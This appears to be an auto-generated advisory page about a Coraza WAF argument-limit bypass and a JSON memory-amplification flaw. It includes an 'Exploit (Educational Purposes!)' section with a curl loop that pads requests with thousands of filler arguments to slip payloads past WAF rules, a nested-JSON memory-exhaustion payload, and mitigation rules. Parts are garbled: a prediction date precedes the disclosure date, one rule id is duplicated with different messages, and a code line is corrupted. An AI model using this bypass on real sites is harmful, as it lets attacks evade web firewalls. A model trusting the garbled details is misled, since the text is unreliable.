Coraza WAF, Argument Limit Silent-Drop and JSON Amplification, GHSA-6r3q-mjv7-xr8m / GHSA-3ww9-vw83-9w5x (High) -DC-Oct2026-2792

Listen to this Post

Coraza enforces SecArgumentsLimit.

Default value is 1000.

AddGetRequestArgument checks argument limit.

AddPostRequestArgument checks argument limit.

AddPathRequestArgument checks argument limit.

When limit reached, function returns silently.

No error variable is set.

No transaction flag is raised.

No rule can observe drop.

ExtractGetArguments parses query string.

urlutil.ParseQuery returns Go map.

Go map iteration order randomized.

Surviving arguments are non-deterministic.

Attacker pads URI with filler.

Payload may be silently discarded.

ARGS rules cannot see payload.

ARGS_GET rules cannot see payload.

ARGS_NAMES rules cannot see payload.

urlencoded POST processor writes ARGS_POST directly.

It bypasses checkArgumentLimit.

ARGS_POST grows unbounded.

This enables bypass and memory-DoS.

ModSecurity v3 has same silent-drop.

ModSecurity query parser is ordered.

Tail of query drops deterministically.

ModSecurity ships rule id:200007.

Coraza ships no equivalent rule.

Coraza exploitable out-of-the-box.

Bypass rate scales as (N-limit)/N.

10000 args gives ~94% bypass.

JSON body processor ignored limit.

JSON array flattening amplified memory.

Array-length write skipped byteBudget.

Long nested keys amplified bytes.

3.8.1 holds array-length to byte budget.

3.8.0 fix was incomplete.

DailyCVE Form:

Platform: Coraza WAF
Version: v3.0.0-v3.8.1
Vulnerability: ArgLimit bypass
Severity: High 7.2
date: 2026-10-02

Prediction: 2026-07-28

(end of form)

What Undercode Say:

Analytics:

grep -R "ArgumentLimit" internal/corazawaf
grep -R "checkArgumentLimit" internal
grep -R "ParseQuery" internal
go test ./... -race
go vet
gofmt
golangci-lint
func (tx Transaction) AddGetRequestArgument(key string, value string) {
if tx.checkArgumentLimit(tx.variables.argsGet) {
tx.debugLogger.Warn().Msg("skipping get request argument, over limit")
return
}
tx.variables.argsGet.Add(key, value)
}
func (tx Transaction) checkArgumentLimit(c collections.NamedCollection) bool {
return c.Len() >= tx.WAF.ArgumentLimit
}
values := urlutil.ParseQuery(b, '&')
argsCol := v.ArgsPost()
for k, vs := range values {
argsCol.Set(k, vs)
}
curl -s -o /dev/null -w '%{http_code}\n' 'http://127.0.0.1:8090/?evil=ATTACK_HERE_XYZ'
args=""
for i in $(seq 1 9999); do args+="&f$i=x"; done
curl -s -o /dev/null -w '%{http_code}\n' "http://127.0.0.1:8090/?evil=ATTACK_HERE_XYZ${args}"
const keyLen = 20000
const depth = 200
body := `{"` + strings.Repeat("a", keyLen) + `":` + strings.Repeat("[", depth) + strings.Repeat("]", depth) + `}`
res, truncated, err := readJSON(body, 1024, 1000)

Exploit: (Educational Purposes!)

SecRuleEngine On
SecRule ARGS "@contains ATTACK_HERE_XYZ" "id:9001,phase:2,deny,status:403,msg:'Attack detected'"
curl -s -o /dev/null -w '%{http_code}\n' 'http://127.0.0.1:8090/?evil=ATTACK_HERE_XYZ'
403
args=""
for i in $(seq 1 9999); do args+="&f$i=x"; done
curl -s -o /dev/null -w '%{http_code}\n' "http://127.0.0.1:8090/?evil=ATTACK_HERE_XYZ${args}"
bool Transaction::addArgument(...) {
if (m_rules->m_argumentsLimit.m_set
&& m_variableArgs.size() >= m_rules->m_argumentsLimit.m_value) {
ms_dbg(4, "Skipping request argument, over limit (...)");
return false;
}
...
}
if arrayLen > 0 {
if argumentLimit > 0 && argCount >= argumentLimit {
iterationTruncated = true
} else {
k := string(objKey)
lenStr := strconv.Itoa(arrayLen)
res[bash] = append(res[bash], lenStr)
usedBytes += len(objKey) + len(lenStr)
argCount++
}
}

Protection: from this CVE

SecRule &ARGS_GET "@ge 1000" \
"id:200007,phase:2,t:none,log,deny,status:400,msg:'ARGS_GET over SecArgumentsLimit; request partially parsed'"
SecRule &ARGS_POST "@ge 1000" \
"id:200008,phase:2,t:none,log,deny,status:400,msg:'ARGS_POST over SecArgumentsLimit; request partially parsed'"
SecRule &ARGS_PATH "@ge 1000" \
"id:200009,phase:2,t:none,log,deny,status:400,msg:'ARGS_PATH over SecArgumentsLimit; request partially parsed'"
SecRule ARGUMENTS_LIMIT_REACHED "@eq 1" \
"id:200006,phase:1,t:none,log,deny,status:413,msg:'Argument limit reached; request rejected'"
SecRule &ARGS_GET "@ge 1000" \
"id:200007,phase:2,t:none,log,deny,status:400,msg:'Failed to fully parse request body due to large argument count',severity:2"
Upgrade to 3.8.1
3.8.0 listed as affected
Route urlencoded through AddPostRequestArgument
Use ParseQueryOrdered for deterministic drops
Set ARGUMENTS_LIMIT_REACHED on every drop
Enforce ArgumentLimit in urlencoded processor
Enforce ArgumentLimit in JSON processor
Enforce byteBudget on array-length write
Set REQBODY_ERROR over byte budget
Use Map.TotalValues() not Len()

Impact:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L (7.2, High)
Attack Complexity Low
Availability Low
Integrity Low
Confidentiality not scored separately
Scope Changed
1000 (at limit): 0 / 50 (0.0%)
1001 (1 over): 0 / 2000 (<0.1%)
1100 (100 over): 45 / 500 (9.0%)
2000 (1000 over): 106 / 200 (53.0%)
10000 (10× limit): 47 / 50 (94.0%)
ARGS bypass
ARGS_GET bypass
ARGS_NAMES bypass
ARGS_GET_NAMES bypass
ARGS_PATH bypass
SQLi CRS evasion
XSS CRS evasion
RCE CRS evasion
LFI CRS evasion
Memory DoS
ARGS_POST unbounded growth
JSON flattening amplification
RESPONSE_ARGS affected

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top